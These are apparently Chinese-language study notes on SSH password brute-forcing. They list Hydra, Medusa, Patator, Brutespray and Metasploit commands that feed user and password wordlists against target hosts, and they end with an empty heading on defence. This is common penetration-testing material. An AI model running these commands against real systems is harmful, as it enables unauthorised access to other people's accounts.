Hydra(海德拉)
#用户库
vim userlist.txt
#密码库
vim passlist.txt
#主机库
vim targets.txt
hydra -h (命令帮助)
hydra -h |less
hydra -l user(指定用户login)+主机+服务(ssh)
hydra -p password(指定密码)
hydra -L userlist.txt(用户库)
hydra -P passlist.txt(密码库)
hydra -M hostlist.txt ssh(主机库)
-oO ssh-hydra.txt (破解结果导入文件里,保存时:set list可以显示出是否密码中有空格)
Medusa(美杜莎)
里插入图片描述
例如:
medusa -M ssh -H hostlist.txt -U userlist.txt -P passlist.txt -O ssh-medusa.txt
Patator
patator -h
patator ssh_login --help #模块帮助
patator ssh_login host=192.168.x.x user=FILE0 0=userlist.txt password=FILE1 1=passlist.txt
#排除fail的信息
patator ssh_login host=192.168.x.x user=FILE0 0=userlist.txt
password=FILE1 1=passlist.txt -x ignore:mesg='fail共有的信息'
Brutespray
Kali 安装
apt-get install brutespray
MSF
MSF提供框架,调用相应的载荷,它不是一个攻击工具
msfconsole #msf控制台
search ssh
use auxiliary
暴力破解防御